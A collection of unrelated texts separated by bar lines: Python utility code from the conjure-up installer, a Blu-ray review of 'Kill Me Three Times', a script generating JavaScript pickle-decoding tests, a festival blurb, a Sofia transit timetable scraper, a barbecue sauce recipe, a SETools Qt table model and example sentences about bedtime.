kwargs['level'] = logging.ERROR
kwargs['tags'] = dict(default_tags, **(tags or {}))
app.sentry.capture(event_type, **kwargs)
except Exception:
pass
async def can_sudo(password=None):
if not password and app.sudo_pass:
password = app.sudo_pass
if password:
opt = '-S' # stdin
password = '{}\n'.format(password).encode('utf8')
else:
opt = '-n' # non-interactive
proc = await asyncio.create_subprocess_exec('sudo', opt, '/bin/true',
stdin=subprocess.PIPE,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if password:
await proc.communicate(password)
else:
await proc.wait()
return proc.returncode == 0
def juju_version():
""" Get current Juju version
"""
cmd = run_script('{} version'.format(app.juju.bin_path))
if cmd.returncode == 0:
return parse_version(cmd.stdout.decode().strip())
else:
raise Exception("Could not determine Juju version.")
def snap_version():
""" Get snap version
"""
cmd = run_script('snap version')
if cmd.returncode == 0:
name_version_str = cmd.stdout.decode().splitlines()[0]
try:
name, version = name_version_str.split()
if '~' in version:
version, series = version.split('~')
return parse_version(version)
except:
raise Exception("Could not determine Snap version.")
def send_msg(msg, label, color, attrs=['bold']):
if app.conjurefile['color'] == 'auto':
colorized = sys.__stdout__.isatty()
elif app.conjurefile['color'] == 'always':
colorized = True
else:
colorized = False
if app.conjurefile['debug']:
print("[{}] {}".format(label, msg))
elif colorized:
cprint("[{}] ".format(label),
color,
attrs=attrs,
end="{}\n".format(msg), flush=True)
else:
print("[{}] {}".format(label, msg), flush=True)
def info(msg):
send_msg(msg, 'info', 'green')
def error(msg):
send_msg(msg, 'error', 'red')
def warning(msg):
send_msg(msg, 'warning', 'yellow')
def install_home():
""" returns installer user home
"""
return os.path.expanduser("~" + install_user())
def juju_path():
""" returns juju path for $user
"""
return os.getenv('JUJU_DATA',
os.path.expanduser('~/.local/share/juju'))
def mkdir(path):
if not os.path.isdir(path):
os.makedirs(path)
chown(path, install_user(), recursive=True)
def _normalize_bundle(original_bundle, overlay_bundle):
""" Normalizes top level application/services keys
"""
if 'applications' in original_bundle and 'services' in overlay_bundle:
overlay_bundle['applications'] = overlay_bundle.pop('services')
if 'services' in original_bundle and 'applications' in overlay_bundle:
overlay_bundle['services'] = overlay_bundle.pop('applications')
def merge_dicts(*dicts):
"""
Return a new dictionary that is the result of merging the arguments
together.
In case of conflicts, later arguments take precedence over earlier
arguments.
ref: http://stackoverflow.com/a/8795331/3170835
"""
updated = {}
# grab all keys
keys = set()
for d in dicts:
keys = keys.union(set(d))
for key in keys:
values = [d[key] for d in dicts if key in d]
# which ones are mapping types? (aka dict)
maps = [value for value in values if isinstance(value, Mapping)]
lists = [value for value in values if isinstance(value, (list, tuple))]
if maps:
# if we have any mapping types, call recursively to merge them
updated[key] = merge_dicts(*maps)
elif lists:
# if any values are lists, we want to merge them (non-recursively)
# first, ensure all values are lists
for i in range(len(values)):
if not isinstance(values[i], (list, tuple)):
values[i] = [values[i]]
# then, merge all of the lists into a single list
updated[key] = list(chain.from_iterable(values))
else:
# otherwise, just grab the last value we have, since later
# arguments take precedence over earlier arguments
updated[key] = values[-1]
return updated
def subtract_dicts(*dicts):
"""
Return a new dictionary that is the result of subtracting each dict
from the previous. Except for mappings, the values of the subsequent
are ignored and simply all matching keys are removed. If the value is
a mapping, however, then only the keys from the sub-mapping are removed,
recursively.
"""
result = merge_dicts(dicts[0], {}) # make a deep copy
for d in dicts[1:]:
for key, value in d.items():
if key not in result:
continue
if isinstance(value, Mapping):
result[key] = subtract_dicts(result[key], value)
if not result[key]:
# we removed everything from the mapping,
# so remove the whole thing
del result[key]
elif isinstance(value, (list, tuple)):
if not isinstance(result[key], (list, tuple)):
# if the original value isn't a list, then remove it
# if it matches any of the values in the given list
if result[key] in value:
del result[key]
else:
# for lists, remove any matching items (non-recursively)
result[key] = [item
for item in result[key]
if item not in value]
if not result[key]:
# we removed everything from the list,
# so remove the whole thing
del result[key]
else:
del result[key]
return result
def chown(path, user, group=None, recursive=False):
""" Change user/group ownership of file
Arguments:
path: path of file or directory
user: new owner username
group: new owner group name
recursive: set files/dirs recursively
"""
if group is None:
group = user
try:
if not recursive or os.path.isfile(path):
shutil.chown(path, user, group)
else:
for root, dirs, files in os.walk(path):
shutil.chown(root, user, group)
for item in dirs:
shutil.chown(os.path.join(root, item), user, group)
for item in files:
shutil.chown(os.path.join(root, item), user, group)
except OSError as e:
raise e
def spew(path, data, owner=None):
""" Writes data to path
Arguments:
path: path of file to write to
data: contents to write
owner: optional owner of file
"""
with open(path, 'w') as f:
f.write(data)
if owner:
try:
chown(path, owner)
except:
raise Exception(
"Unable to set ownership of {}".format(path))
def slurp(path):
""" Reads data from path
Arguments:
path: path of file
"""
try:
with path.open() as f:
return f.read().strip()
except IOError:
raise IOError
def install_user():
""" returns current user
"""
user = os.getenv('USER', None)
if user is None:
raise Exception("Unable to determine current user.")
return user
def set_chosen_spell(spell_name, spell_dir):
track_event("Spell Choice", spell_name, "")
app.env['CONJURE_UP_SPELL'] = spell_name
app.config.update({'spell-dir': spell_dir,
'spell': spell_name})
def set_spell_metadata():
app.metadata = SpellMetadata.load(
Path(app.config['spell-dir']) / 'metadata.yaml')
def get_spell_metadata(spell):
""" Returns metadata about spell
"""
metadata_path = Path(app.config['spells-dir']) / spell / 'metadata.yaml'
return SpellMetadata.load(metadata_path)
def __available_on_darwin(key):
""" Returns True if spell is available on macOS
"""
metadata = get_spell_metadata(key)
if metadata.cloud_whitelist \
and 'localhost' in metadata.cloud_whitelist:
return False
if metadata.spell_type == consts.spell_types.SNAP:
return False
return True
def find_spells():
""" Find spells, excluding localhost only and snap spells if not linux
"""
_spells = []
for category, cat_dict in app.spells_index.items():
for sd in cat_dict['spells']:
if is_darwin() and not __available_on_darwin(sd['key']):
continue
_spells.append((category, sd))
return _spells
def find_addons_matching(key):
if key in app.addons_aliases:
return app.addons_aliases[key]
return {}
def find_spells_matching(key):
if key in app.spells_index:
_spells = []
for sd in app.spells_index[key]['spells']:
if is_darwin() and not __available_on_darwin(sd['key']):
continue
_spells.append((key, sd))
return _spells
for category, d in app.spells_index.items():
for spell in d['spells']:
if spell['key'] == key:
if is_darwin() and not __available_on_darwin(spell['key']):
continue
return [(category, spell)]
return []
def get_options_whitelist(service_name):
"""returns list of whitelisted option names.
If there is no whitelist, returns []
"""
metadata = app.metadata
if metadata is None:
return []
options_whitelist = metadata.options_whitelist
if options_whitelist is None:
return []
svc_opts_whitelist = options_whitelist.get(service_name, [])
return svc_opts_whitelist
def gen_hash():
""" generates a UUID
"""
return str(uuid.uuid4()).split('-')[0][:3]
def gen_model():
""" generates a unique model name
"""
name = "conjure-{}".format(app.env['CONJURE_UP_SPELL'])
return "{}-{}".format(name[:24], gen_hash())
def gen_cloud():
""" generates a unique cloud
"""
name = "cloud-{}".format(app.provider.cloud_type)
return "{}-{}".format(name[:24], gen_hash())
def is_darwin():
""" Checks if host platform is macOS
"""
return sys.platform.startswith('darwin')
def is_linux():
""" Checks if host platform is linux
"""
return sys.platform.startswith('linux')
def is_valid_hostname(hostname):
""" Checks if a hostname is valid
Graciously taken from http://stackoverflow.com/a/2532344/3170835
"""
if len(hostname) > 255:
return False
if hostname[-1] == ".":
# strip exactly one dot from the right, if present
hostname = hostname[:-1]
allowed = re.compile(r"(?!-)[A-Z\d\-\_]{1,63}(?<!-)$", re.IGNORECASE)
return all(allowed.match(x) for x in hostname.split("."))
def set_terminal_title(title):
""" Sets the terminal title
"""
sys.stdout.write("\x1b]2;{}\x07".format(title))
def get_physical_network_interfaces():
""" Returns a list of physical network interfaces
We whitelist eth due to some instances where users run
conjure-up inside a single LXD container. At that point
all devices are considered virtual and all network device
naming follows the ethX pattern.
"""
sys_class_net = Path('/sys/class/net')
devices = []
for device in sys_class_net.glob("*"):
parts = str(device.resolve()).split('/')
if "virtual" in parts and not parts[-1].startswith('eth'):
continue
try:
if not get_physical_network_ipaddr(device.name):
continue
except Exception:
continue
devices.append(device.name)
if len(devices) == 0:
raise Exception(
"Could not find a suitable physical network interface "
"to create a LXD bridge on. Please check your network "
"configuration.")
return sorted(devices)
def get_physical_network_ipaddr(iface):
""" Gets an IP Address for network device, ipv4 only
Arguments:
iface: interface to query
"""
out = run_script('ip addr show {}'.format(iface))
if out.returncode != 0:
raise Exception(
"Could not determine an IPv4 address for {}".format(iface))
app.log.debug("Parsing {} for IPv4 address".format(
out.stdout.decode('utf8')))
try:
ipv4_addr = out.stdout.decode(
'utf8').split('inet ')[1].split('/')[0]
except IndexError:
return None
return ipv4_addr
def get_open_port():
""" Gets an unused port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class IterQueue(asyncio.Queue):
"""
Queue subclass that supports the ``async for`` syntax.
When the producer is done adding items, it must call `close` to
notify the consumer.
Example::
queue = IterQueue()
async def consumer():
async for line in queue:
print(line)
async def producer():
with open('filename') as fp:
for line in fp:
await queue.put(line)
queue.close()
"""
def __init__(self, *args, **kwargs):
self.sentinal = []
super().__init__(*args, **kwargs)
def __aiter__(self):
return self
async def __anext__(self):
item = await self.get()
if item is self.sentinal:
raise StopAsyncIteration
return item
async def close(self):
await self.put(self.sentinal)
class SanitizeDataProcessor(SanitizePasswordsProcessor):
"""
Sanitize data sent to Sentry.
Performs the same santiziations as the SanitizePasswordsProcessor, but
also sanitizes values.
"""
def sanitize(self, key, value):
value = super().sanitize(key, value)
if value is None:
return value
def _check_str(s):
sl = s.lower()
for field in self.KEYS:
if field not in sl:
continue
if 'invalid' in s or 'error' in s:
return '***(contains invalid {})***'.format(field)
else:
return '***(contains {})***'.format(field)
return s
if isinstance(value, str):
# handle basic strings
value = _check_str(value)
elif isinstance(value, bytes):
# handle bytes
value = _check_str(value.decode('utf8', 'replace'))
elif isinstance(value, (list, tuple, set)):
# handle list-like
orig_type = type(value)
value = list(value)
for i, item in enumerate(value):
value[i] = self.sanitize(key, item)
value = orig_type(value)
elif isinstance(value, dict):
# handle dicts
for key, value in value.items():
value[key] = self.sanitize(key, value)
else:
# handle everything else by sanitizing its JSON encoding
# note that we don't want to use the JSON encoded value if it's
# not being santizied, because it will end up double-encoded
value_json = json.dumps(value)
sanitized = _check_str(value_json)
if sanitized != value_json:
value = sanitized
return value
class TestError(Exception):
def __init__(self):
super().__init__('This is a dummy error for testing reporting')
class SudoError(Exception):
pass
class UtilsHTTPError(Exception):
pass
|
The double crosses pile up in this comedic thriller starring Simon Pegg as a jaded hit man on a seemingly routine job. The assassin finds himself in the center of three tales of murder, mayhem, blackmail and revenge intertwine when a gambling addict, a small town "Lady Macbeth," a club owner, a policeman and a lover all converge on the same mark.
Can a movie skirt critical disaster based on the undeniable allure of a silly mustache alone? Well, maybe not alone, but it can certainly help. A lot. Derivative yet marked by just enough personality to avoid complete mediocrity, 'Kill Me Three Times' attempts to bring a few playful twists to the tried-and-true crime genre. Unfortunately, outside of Simon Pegg's amusing whiskers, these cinematic spins really aren't very original, leading to a familiar but still worthwhile pulp thriller. We may have seen this exact kind of story before -- but this time it features a man with ridiculous facial hair! Now, who says the movie industry is out of ideas?
When a jealous husband (Callan Mulvey) discovers that his wife (Alice Braga) is cheating on him, he hires a professional hit-man, Charlie Wolfe (Simon Pegg), to murder her. But when Wolfe attempts to go through with the assignment, he discovers that another party may already be doing his job for him. As new twists and turns are revealed, the once simple assassination becomes increasingly complicated, exposing a slew of greedy motivations that threaten to leave a growing trail of bodies in their wake.
Structured into three distinct parts, the script jumps around in time and perspective. The first act primarily focuses on the middle of the plot, while the second act largely flashes back to the beginning of the story, and the third act concludes the timeline. This little bit of narrative flash is nothing new, but the mixed-up chronology works as intended, allowing plot twists to unravel as previously unknown information is revealed, adding extra layers to scenes that have already passed. Likewise, the filmmakers maintain a brisk pace throughout the winding runtime, and balance the film's darkly comedic tone fairly well.
Mixing comedy and bloodshed, the movie offers some solid thrills and uncomfortable laughs. As the initially unexpected murder plot unravels, the amateur culprits give off a slightly bumbling quality, and their back and forth squabbling amidst their deadly actions is amusing. At the same time, the flick certainly does not shy away from carnage, resulting in some rather bloody violence and deaths that manage to maintain a humorous spin thanks to a faintly cartoonish style. A few splashy visual flourishes are thrown in here and there as well, including lots of striking aerial footage of the Australian beach locals, and some dramatic slow motion shots that heighten key moments.
Serving as our main vantage point into the story, Simon Pegg's Charlie Wolfe proves to be a fairly fun character. With his horseshoe mustache and goofy smile, there are times when the killer seems like he just walked out of an entirely different movie, but this disconnect actually works well with the film's pulpy tone. And though the man might seem like a joke on the outside, he quickly cements himself as a legitimate threat (minus a few mishaps here and there). The rest of the cast is also very effective, making the most out of their stock character roles -- especially Teresa Palmer who seems to relish every moment of her Lady Macbeth-like turn as Lucy. Also, I'd certainly be remiss if I didn't mention the inclusion of Luke Hemsworth. Yes, that's right, there's a third Hemsworth brother. Not Chris. Not Liam. Luke. And though he might be the Stephen Baldwin of the Hemsworth clan, he's still a solid performer.
Talented cast aside, 'Kill Me Three Times' is not without some notable problems. At the end of the day, none of the characters are very developed. Instead, they're simply pulp genre archetypes playing out standard pulp genre plot threads. There's an abusive husband, a cheating wife, a desperate gambler, a greedy femme fatale, a corrupt cop, a deadly killer, and a twisting scheme that involves -- yes, you guessed it -- insurance fraud! Though some great flicks have resulted from ingredients like this in the past, the script never really does anything particularly interesting with them. Sure, it's clear that the filmmakers have a lot of cheeky admiration for all of these cliches and conventions, but this genre love never evolves into the kind of cinematic creativity found in similar efforts from directors like the Coen Brothers and Quentin Tarantino.
Not bad. That's the general thought I had after finishing 'Kill Me Three Times.' Not particularly good, and definitely far from great -- but not bad. While that might sound like pretty faint praise, that's probably because... well, it is faint praise. And that's about all this flick deserves. There's a decent twist or two, but the script and direction aren't as clever as they need to be, leading to a mostly basic crime thriller that tries to dress up its deficiencies with a jumbled structure and a dumb mustache... and it almost gets away with it.
Magnolia brings 'Kill Me Three Times' to Blu-ray on a single BD-50 disc that comes housed inside a keepcase with a cardboard slipcover. After some skippable trailers, the disc transitions to a traditional menu screen. The packaging indicates the release is Region A coded.
The movie is provided with a 1080p/AVC MPEG-4 transfer in the 2.39:1 aspect ratio. Sharp and colorful, this is a very impressive image free from any major flaws.
The source is clean and crisp with no signs of troublesome noise. Clarity is exceptional throughout, offering sharp fine details and textures. Wide aerial shots of the ocean and beach locals are especially striking, and the waters shimmer nicely off the screen. The color palette features richly saturated primaries with bold reds, blues, and greens that pop from the screen. With that said, contrast is rather blown out at times, leading to a slightly washed out look in whites during bright sequences. Thankfully, blacks are deep and inky without crushing. Though artifacts are essentially absent, there is a hint of aliasing and contouring in a shot or two.
With often gorgeous color and impeccable detail, 'Kill Me Three Times' looks fantastic on Blu-ray. The faintly cartoonish visual style works well with the tone, and the transfer is technically proficient.
The film is presented with an English DTS-HD MA 5.1 track along with English SDH and Spanish subtitles. Though not demo worthy, the mix bolsters the content well, adding some nice kick and lively personality to the proceedings.
Dialogue is clear and well prioritized with no balance issues to report. The soundstage is relatively immersive, with a solid sense of general atmosphere and surround use (birds chirping, crashing waves, blowing wind), helping to enhance the beach town ambiance. Directionality is also good, spreading appropriate panning effects between speakers as characters and cars move about the screen. Likewise, the movie's livelier moments offer a nice jolt, lending gunshots and explosions a hefty punch. Dynamic range is also wide and distortion free, and the film's playful score comes through well with pleasing fidelity and separation.
For a fairly low budget crime flick, the audio here sounds quite good. The sound design isn't as enveloping as more robust tracks, but it's effective all the same.
Magnolia has provided a solid assortment of supplements, including two commentaries. All of the special features are presented in 1080p with Dolby Digital 2.0 sound.
Commentary with Director Kriv Stenders and Cinematographer Geoffrey Simpson – Stenders and Simpson sit down for a steady and informative discussion about the movie. The pair focuses on the film's shots and visual style, but also address a wealth of production trivia including details on casting, editing, influences, storyboards, deleted material, locations, and scheduling. Filled with interesting movie-making tidbits, this is a great listen for budding filmmakers.
Commentary with Director Kriv Stenders and Producers Tania Chambers, Laurence Malkin, and Share Stallings – For the second commentary, Stenders is now joined by a trio of producers. Though a lot of the same ground is covered here, the participants expand upon topics already broached and offer some more details about the film's shoot. Though I'm not sure that two commentaries were really necessary, fans might want to take a listen.
Deleted Scene (HD, 3 min) – A single deleted scene featuring a musical performance by Alice is included. This is a strong sequence but might be a little too on the nose.
The Making of Kill Me Three Times (HD, 18 min) – This is an informative behind-the-scenes doc that features cast & crew interviews. The casting, characters, visuals, and script are all addressed along with several worthwhile production insights.
Q&A (HD, 14 min) – Recorded in 2014 at the BFI London Film Festival, this Q&A features actor Simon Pegg and the film's producers. The group discus how they accommodated Pegg's limited schedule, the movie's inspirations, and the drawbacks to a horseshoe mustache.
Storyboards (HD, 5 min) – This is a reel of storyboards for several important scenes set to music.
Behind the Scenes Photo Gallery – Here we get a collection of on-set photos.
Poster Gallery - A gallery of character posters from the film is included.
'Kill Me Three Times' is a familiar but still worthwhile pulp crime thriller. Though the plot and characters are pretty basic, the cast and darkly comedic tone are entertaining. On the technical front, the disc's video and audio are both strong. Magnolia has also provided a nice assortment of supplements, including two commentaries and a behind-the-scenes featurette. The movie doesn't break any new ground, but this is still a loving little genre flick that might appeal to big fans of similar efforts. Worth a look.
|
#!/usr/bin/python
from __future__ import print_function
import pickle
import binascii
class MyClass:
def __init__(self):
self.data = "test"
class MyOtherClass:
def __init__(self):
self.myclass = MyClass()
self.myclasses = [ MyClass(), MyClass() ]
self.myclasses[0].data = "new test value"
class MySubClass(MyOtherClass):
def __init__(self):
MyOtherClass.__init__(self)
self.subvalue = 12
myclass = MyClass()
myclassescontainer = { "myclass1" : MyClass(), "myclass2" : MyClass() }
myclassescontainer["myclass1"].data = "new test value 1"
myclassescontainer["myclass2"].data = "new test value 2"
myotherclass = MyOtherClass()
mysubclass = MySubClass()
testfile = open("./class_tests.js", "w")
print("var assert = require('assert'),\n" \
" util = require('util'),\n" \
" jpickle = require('../lib/jpickle');\n\n", file = testfile )
print("function MyClass() {\n" \
"}\n\n", file = testfile )
print("function MyOtherClass() {\n" \
" this.mymethod = function() { return this.myclass.data + ' foo!';}; \n" \
"}\n\n", file = testfile )
print("function MySubClass() {\n" \
"}\n" \
"util.inherits(MySubClass, MyOtherClass);\n\n", file = testfile )
print("jpickle.emulated['__main__.MyClass'] = MyClass;\n" \
"jpickle.emulated['__main__.MyOtherClass'] = MyOtherClass;\n" \
"jpickle.emulated['__main__.MySubClass'] = MySubClass;\n\n", file = testfile )
print("\ndescribe('pickle version 2 classes', function() {\n", file = testfile )
print(" it('should decode simple classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.data, 'test');\n" \
" });\n\n" % pickle.dumps( myclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode simple classes in a container', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded['myclass1'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass2'] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded['myclass1'].data, 'new test value 1');\n" \
" assert.strictEqual(decoded['myclass2'].data, 'new test value 2');\n" \
" });\n\n" % pickle.dumps( myclassescontainer, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing classes', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode a subclass and a superclass', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded instanceof MyOtherClass, true);\n" \
" assert.strictEqual(decoded instanceof MySubClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0] instanceof MyClass, true);\n" \
" assert.strictEqual(decoded.myclasses[0].data, 'new test value');\n" \
" assert.strictEqual(decoded.myclass.data, 'test');\n" \
" assert.strictEqual(decoded.subvalue, 12);\n" \
" });\n\n" % pickle.dumps( mysubclass, protocol=2 ).encode('string-escape'), file = testfile )
print(" it('should decode classes containing method', function() {\n" \
" var decoded = jpickle.loads('%s');\n" \
" assert.strictEqual(decoded.mymethod(), 'test foo!');\n" \
" });\n\n" % pickle.dumps( myotherclass, protocol=2 ).encode('string-escape'), file = testfile )
print("});\n\n", file = testfile )
|
The second weekend is aligned with the Full Moon Phase. This is mainly associated with completeness, sustainability, responsibility and accountability. The projects presented in this phase are critically engaged with the ongoing state of colonialism in former empires such as the former French and Belgian colonies, where colonialism makes itself felt in multinational extractivism activities or national and international laws for newcomers.
Masterclass - Colonisation in Belgian films in the last 30 years: a taboo?
|
import requests
import re
import time
from html.parser import HTMLParser
import json
import os
import datetime
from multiprocessing.dummy import Pool as ThreadPool
class PageParsing:
"""Parsing class with static methods"""
MAIN_PAGE = "http://schedules.sofiatraffic.bg/"
TRANSPORT_RE = '(tramway|trolleybus|autobus){1}'
@classmethod
def parse_schedule_buttons(cls, content):
# get all schedule btn ids from the content
SCHEDULE_BTN_ID_RE = 'id="schedule_\d*_button"'
schedule_btns = re.findall(SCHEDULE_BTN_ID_RE, content)
# contains the found schedule ids
btns = []
for btn in schedule_btns:
schedule_id = btn.replace('id="schedule_', "")
schedule_id = schedule_id.replace('_button"', "")
btns.append(schedule_id)
return btns
@classmethod
def parse_schedule_name(cls, content, schedule_id):
# get the schedule name like "делник" / "предпразник / празник"
SCHEDULE_BTN_RE = 'id="schedule_{}_button".*?>.*?</a>'.format(schedule_id)
SCHEDULE_BTN_TITLE_RE = '<span>.*?</span>'
schedule_btn = re.findall(SCHEDULE_BTN_RE, content)[-1]
schedule_title = re.findall(SCHEDULE_BTN_TITLE_RE, schedule_btn)[-1]
schedule_title = schedule_title.replace("<span>", "")
schedule_title = schedule_title.replace("</span>", "")
return schedule_title
@classmethod
def check_is_weekly_schedule(cls, schedule):
# no idea why this doesnt work
# return schedule == "делник"
return schedule == b'\xd0\xb4\xd0\xb5\xd0\xbb\xd0\xbd\xd0\xb8\xd0\xba'
@classmethod
def parse_routes_stops(cls, content):
# get all stations from the content
STOPS_LI_RE = '<li class="\s+stop_\d*">.*?</li>'
STOP_NAME_A_RE = '<a .*? class="stop_change".*?>.*?</a>'
STOP_NAME_RE = '>.*?<'
STOP_HREF_A_RE = '<a.*?class="stop_link".*?>.*?</a>'
STOP_HREF_RE = 'id=".*?"'
stops_li = re.findall(STOPS_LI_RE, content)
# contains the found stops
stops = []
for stop_li in stops_li:
# get the first (and only) stop name a tag
stop_name_a = re.findall(STOP_NAME_A_RE, stop_li).pop()
# get the first (and only) stop name from a tag
stop_name = re.findall(STOP_NAME_RE, stop_name_a).pop()
stop_name = stop_name.replace(">", "")
stop_name = stop_name.replace("<", "")
# get the first (and only) stop href a tag
stop_href_a = re.findall(STOP_HREF_A_RE, stop_li).pop()
# get the first (and only) stop href from a tag
stop_href = re.findall(STOP_HREF_RE, stop_href_a).pop()
stop_href = stop_href.replace('id="', "")
stop_href = stop_href.replace('"', "")
ids = re.findall("\d{1,}", stop_href)
stops.append({
"stop_name": stop_name,
"schedule": "",
"direction": "",
"stop_no": ids[2]
})
return stops
@classmethod
def parse_routes_times(cls, content):
# get all time formated strings from the content
TIME_RE = '\d{0,2}:\d{2}'
time_resilts = re.findall(TIME_RE, content)
return time_resilts
@classmethod
def generate_route_stops_url(cls, schedule, direction, stop_no):
# "server/html/schedule_load/4018/1165/1254"
return "server/html/schedule_load/{}/{}/{}".format(schedule, direction, stop_no)
@classmethod
def parse_route_direction(cls, content, route):
# collect data for the directions of the route
DIRECTIONS_RE = '<a href="/{}#direction/\d*" id="schedule_direction_\d*_\d*_button" class=".*?schedule_view_direction_tab">.*?</a>'.format(route)
directions_result = re.findall(DIRECTIONS_RE, content)
directions = set()
# parse the data of the directions
for direction in directions_result:
# get the route url
URL_RE = '/\w*/.*?/\d*'
url_result = re.search(URL_RE, direction)
url = url_result.group(0)
url = url.replace("/", "", 1)
# get the route title
TITLE_RE = 'n>.*?<'
title_result = re.search(TITLE_RE, direction)
title = title_result.group(0)
title = title.replace("n>", "")
title = title.replace("<", "")
directions.add((url, title))
return directions
@classmethod
def get_route_stations(cls, route):
# get all stations by schedule directions for the route
time_last = time.time()
route_url = "{}{}".format(cls.MAIN_PAGE, route)
r = requests.get(route_url)
content = "{}".format(r.content)
# get all times for this route
stops = cls.parse_routes_stops(content)
# get the schedule buttons for the current route
schedules = cls.parse_schedule_buttons(content)
# get the directions for the current route
directions = cls.parse_route_direction(content, route)
direction_stops_times = []
for schedule in schedules:
# get the schedule type name
schedule_name = cls.parse_schedule_name(content, schedule)
for direction in directions:
# get the direction id
direction_id = re.findall("\d{1,}", direction[0]).pop()
for stop in stops:
# set the direction and schedule
stop["schedule"] = schedule_name
stop["direction"] = direction[1]
# get the url for this stop
stop_url = cls.generate_route_stops_url(schedule, direction_id, stop["stop_no"])
stop_url = "{}{}".format(cls.MAIN_PAGE, stop_url)
sr = requests.get(stop_url)
stop_content = "{}".format(sr.content)
# check for wrong request with empty body
if stop_content == "":
continue
# get all times for this route
schedule_times = cls.parse_routes_times(stop_content)
# check for wrong request with empty body
if len(schedule_times) == 0:
continue
direction_stops_times.append({
"url": stop_url,
"times": schedule_times,
"schedule_id": schedule,
"weekly_schedule": cls.check_is_weekly_schedule(schedule_name),
"direction_id": direction_id,
"stop": {
"schedule": schedule_name,
"direction": direction[1],
"stop_name": stop["stop_name"],
"stop_no": stop["stop_no"]
}
})
# print(json.dumps(direction_stops_times))
today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
json_file = "{}/{}.json".format(today, route.replace("/", "_"))
temp_file = open(json_file, 'w')
temp_file.write(json.dumps(direction_stops_times))
temp_file.close()
current_time = time.time()
print(json_file, current_time - time_last)
return direction_stops_times
@classmethod
def run_thread(cls, url):
# function that runs in the threads
line = list(url.keys())[0]
return cls.get_route_stations(url.get(line))
@classmethod
def parse_traffic_links(cls, content):
# get all transport page urls from the content
class TransportLinksParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.recording = 0
self.data = []
self.link = ""
def handle_starttag(self, tag, attributes):
if tag != 'a':
return
for name, val in attributes:
if name == 'href' and re.match(cls.TRANSPORT_RE, val):
self.recording += 1
self.link = val
break
else:
self.link = ""
def handle_endtag(self, tag):
if tag == 'a' and self.recording:
self.recording -= 1
def handle_data(self, data):
if self.recording and self.link != "":
self.data.append({data: self.link})
lp = TransportLinksParser()
lp.feed(content)
return lp.data
@classmethod
def parse_main_page(cls):
# get the main page and craw ...
r = requests.get(cls.MAIN_PAGE)
content = "{}".format(r.content)
urls = cls.parse_traffic_links(content)
today = datetime.datetime.strftime(datetime.datetime.now(), '%Y-%m-%d')
if not os.path.exists(today):
os.mkdir(today)
# craw in 4 threads
pool = ThreadPool(4)
pool.map(cls.run_thread, urls)
if __name__ == '__main__':
time_last = time.time()
print("Started parsing the {} website!".format(PageParsing.MAIN_PAGE))
PageParsing.parse_main_page()
current_time = time.time()
print("Parsed for {} seconds".format(current_time - time_last))
|
Baste your next roast with this Southern Barbecue Sauce Recipe.
This Southern Barbecue Sauce Recipe is great for basting your meat during the last hour of cooking.
Next time you're ready to roast meat or use the grill, whip together this Southern Barbecue Sauce Recipe. Your friends and family will thank you.
In saucepan, combine vinegar, water, brown sugar, mustard, paprika, salt and pepper.
Add lemon juice, onion, butter and ketchup; bring to a boil, and boil for 20 minutes, uncovered. Add Worcestershire sauce and liquid smoke; pour into a bottle and cover tightly.
To use: Put on meat for at least 1 hour of cook time, basting and turning meat often.
Without an amount listed for the liquid smoke I'm going to substitute 1 t. of Hickory salt I have on hand.
|
# Copyright 2016, Tresys Technology, LLC
#
# This file is part of SETools.
#
# SETools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1 of
# the License, or (at your option) any later version.
#
# SETools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SETools. If not, see
# <http://www.gnu.org/licenses/>.
#
import stat
from PyQt5.QtCore import Qt
from .models import SEToolsTableModel
class GenfsconTableModel(SEToolsTableModel):
"""Table-based model for genfscons."""
headers = ["FS Type", "Path", "File Type", "Context"]
_filetype_to_text = {
0: "Any",
stat.S_IFBLK: "Block",
stat.S_IFCHR: "Character",
stat.S_IFDIR: "Directory",
stat.S_IFIFO: "Pipe (FIFO)",
stat.S_IFREG: "Regular File",
stat.S_IFLNK: "Symbolic Link",
stat.S_IFSOCK: "Socket"}
def data(self, index, role):
if self.resultlist and index.isValid():
row = index.row()
col = index.column()
rule = self.resultlist[row]
if role == Qt.DisplayRole:
if col == 0:
return rule.fs
elif col == 1:
return rule.path
elif col == 2:
return self._filetype_to_text[rule.filetype]
elif col == 3:
return str(rule.context)
elif role == Qt.UserRole:
return rule
|
Vincent Spaulding did what he could to cheer me up, but by bedtime I had reasoned myself out of the whole thing.
And when it was bedtime the old man rose up and held out his hand, and says: “Look at it, gentlemen and ladies all; take a-hold of it; shake it.
All day long she dared not go out of doors, and when bedtime had come, the witch’s daughter got into bed first, so as to lie at the far side, but when she was asleep, the other pushed her gently to the front, and took for herself the place at the back, close by the wall.
When Hrothgar’s bedtime comes he leaves the hall in charge of Beowulf, telling him that never before has he given to another the absolute wardship of his palace.
When bedtime came, we all kissed mamma and retired early, as usual.
The hour between tea and bedtime was sufficiently tedious, as both of us were naturally much preoccupied.
